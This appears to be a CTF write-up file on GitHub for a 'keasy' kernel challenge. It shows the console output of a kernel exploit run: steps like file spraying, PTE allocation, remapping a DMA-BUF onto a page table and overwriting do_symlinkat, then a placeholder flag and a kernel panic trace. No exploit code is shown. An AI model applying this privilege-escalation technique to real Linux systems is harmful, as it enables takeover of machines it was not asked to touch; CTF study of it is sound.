-
Notifications
You must be signed in to change notification settings - Fork 71
Expand file tree
/
Copy pathwriteup01.txt
More file actions
98 lines (95 loc) · 6.38 KB
/
Copy pathwriteup01.txt
File metadata and controls
98 lines (95 loc) · 6.38 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
__ _ ___ ____ _____ __ __
| |/ ] / _] / |/ ___/| | |
| ' / / [_ | o ( \_ | | |
| \ | _]| |\__ || ~ |
| \| [_ | _ |/ \ ||___, |
| . || || | |\ || |
|__|\_||_____||__|__| \___||____/
___ ____ _____ __ __ __ _ ___ ____ ____ ___ _ __ __ __ ____ _ _
/ _] / |/ ___/| | | | |/ ] / _]| \ | \ / _]| | / ]| | | / || | | |
/ [_ | o ( \_ | | | | ' / / [_ | D )| _ | / [_ | | / / | | || o || | | |
| _]| |\__ || ~ | | \ | _]| / | | || _]| |___ / / | _ || || |___ | |___
| [_ | _ |/ \ ||___, | | \| [_ | \ | | || [_ | | / \_ | | || _ || || |
| || | |\ || | | . || || . \| | || || | \ || | || | || || |
|_____||__|__| \___||____/ |__|\_||_____||__|\_||__|__||_____||_____| \____||__|__||__|__||_____||_____|
Good luck... 🤓
sh: can't access tty; job control turned off
~ $ /bin/writeup01
[+] Spraying files...
[+] Releasing files...
[+] Allocating PTEs...
[+] dma_buf_fd: 5
[+] Searching for overlapping page...
[+] Found overlapping page: 0xdfb27000
[+] Remapping...
[+] DMA-BUF now points to PTE: 0x800000012e076067
[+] Found victim page table: 0xdfc00000
[+] Physical kernel base address: 0x0000000061600000
[+] Overwriting do_symlinkat...
[+] GO!GO!
[+] Win!
flag{aaaaaaaaaaaaaaaaaaaaaaaa}
[+] Done
[ 22.112071] BUG: Bad page map in process writeup01 pte:800000012e00e067 pmd:1003f1067
[ 22.113472] addr:00000000dfb30000 vm_flags:000000fb anon_vma:0000000000000000 mapping:ffff9b8142619408 index:0
[ 22.113802] file:dev/zero fault:shmem_fault mmap:shmem_mmap read_folio:0x0
[ 22.115200] BUG: Bad page map in process writeup01 pte:800000006184d067 pmd:102646067
[ 22.115444] addr:00000000dfc00000 vm_flags:000000fb anon_vma:0000000000000000 mapping:ffff9b8142619708 index:0
[ 22.115739] file:dev/zero fault:shmem_fault mmap:shmem_mmap read_folio:0x0
[ 22.117360] kernel BUG at fs/open.c:1424!
[ 22.117765] invalid opcode: 0000 [#1] PREEMPT SMP PTI
[ 22.117905] CPU: 0 PID: 125 Comm: writeup01 Tainted: G B O 6.1.63 #3
[ 22.118067] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 22.118247] RIP: 0010:filp_close+0x80/0x90
[ 22.118366] Code: 48 89 df e8 62 58 00 00 89 e8 5b 41 5e 5d c3 cc cc cc cc cc 31 ed f6 43 45 40 74 ce eb e2 48 c7 c7 33 1e d0 9b e8 c8 cf 83 0
[ 22.118617] RSP: 0018:ffffb5bc803dfe50 EFLAGS: 00000246
[ 22.118617] RAX: 0000000000000026 RBX: ffff9b814015b180 RCX: d2f7d347bbc05800
[ 22.118617] RDX: ffffb5bc803dfd38 RSI: 00000000ffffdfff RDI: ffffffff9be78840
[ 22.118617] RBP: 0000000000000000 R08: 0000000000001fff R09: ffffffff9be48840
[ 22.118617] R10: 0000000000005ffd R11: 0000000000000004 R12: 03ffffffffffffff
[ 22.118617] R13: 0000000000000000 R14: ffff9b814015b180 R15: 0000000000000006
[ 22.118617] FS: 0000000000000000(0000) GS:ffff9b817bc00000(0000) knlGS:0000000000000000
[ 22.118617] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 22.118617] CR2: 00000000e0ac7000 CR3: 0000000062a0a000 CR4: 00000000003006f0
[ 22.118617] Call Trace:
[ 22.118617] <TASK>
[ 22.118617] ? __die_body+0x5f/0xb0
[ 22.118617] ? die+0x9b/0xc0
[ 22.118617] ? do_trap+0x9c/0x170
[ 22.118617] ? filp_close+0x80/0x90
[ 22.118617] ? filp_close+0x80/0x90
[ 22.118617] ? handle_invalid_op+0x64/0x80
[ 22.118617] ? filp_close+0x80/0x90
[ 22.118617] ? exc_invalid_op+0x34/0x50
[ 22.118617] ? asm_exc_invalid_op+0x16/0x20
[ 22.118617] ? filp_close+0x80/0x90
[ 22.118617] put_files_struct+0x7a/0xd0
[ 22.118617] do_exit+0x24e/0x8e0
[ 22.118617] do_group_exit+0x88/0x90
[ 22.118617] __x64_sys_exit_group+0xe/0x10
[ 22.118617] do_syscall_64+0x52/0xa0
[ 22.118617] entry_SYSCALL_64_after_hwframe+0x64/0xce
[ 22.118617] RIP: 0033:0x4501f1
[ 22.118617] Code: Unable to access opcode bytes at 0x4501c7.
[ 22.118617] RSP: 002b:00007fff2539f3a0 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7
[ 22.118617] RAX: ffffffffffffffda RBX: 00000000004c9290 RCX: 00000000004501f1
[ 22.118617] RDX: 000000000000003c RSI: 00000000000000e7 RDI: 0000000000000000
[ 22.118617] RBP: 0000000000000000 R08: ffffffffffffffb8 R09: ffff9b81401a5d40
[ 22.118617] R10: 0000000000000000 R11: 0000000000000246 R12: 00000000004c9290
[ 22.118617] R13: 0000000000000000 R14: 00000000004c9d80 R15: 00000000004028a0
[ 22.118617] </TASK>
[ 22.118617] Modules linked in: keasy(O)
[ 22.122985] ---[ end trace 0000000000000000 ]---
[ 22.123128] RIP: 0010:filp_close+0x80/0x90
[ 22.123272] Code: 48 89 df e8 62 58 00 00 89 e8 5b 41 5e 5d c3 cc cc cc cc cc 31 ed f6 43 45 40 74 ce eb e2 48 c7 c7 33 1e d0 9b e8 c8 cf 83 0
[ 22.123658] RSP: 0018:ffffb5bc803dfe50 EFLAGS: 00000246
[ 22.123779] RAX: 0000000000000026 RBX: ffff9b814015b180 RCX: d2f7d347bbc05800
[ 22.123922] RDX: ffffb5bc803dfd38 RSI: 00000000ffffdfff RDI: ffffffff9be78840
[ 22.124076] RBP: 0000000000000000 R08: 0000000000001fff R09: ffffffff9be48840
[ 22.124294] R10: 0000000000005ffd R11: 0000000000000004 R12: 03ffffffffffffff
[ 22.124433] R13: 0000000000000000 R14: ffff9b814015b180 R15: 0000000000000006
[ 22.124604] FS: 0000000000000000(0000) GS:ffff9b817bc00000(0000) knlGS:0000000000000000
[ 22.124845] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 22.124981] CR2: 00000000e0ac7000 CR3: 0000000062a0a000 CR4: 00000000003006f0
[ 22.125201] Kernel panic - not syncing: Fatal exception
[ 22.125648] Kernel Offset: 0x19a00000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)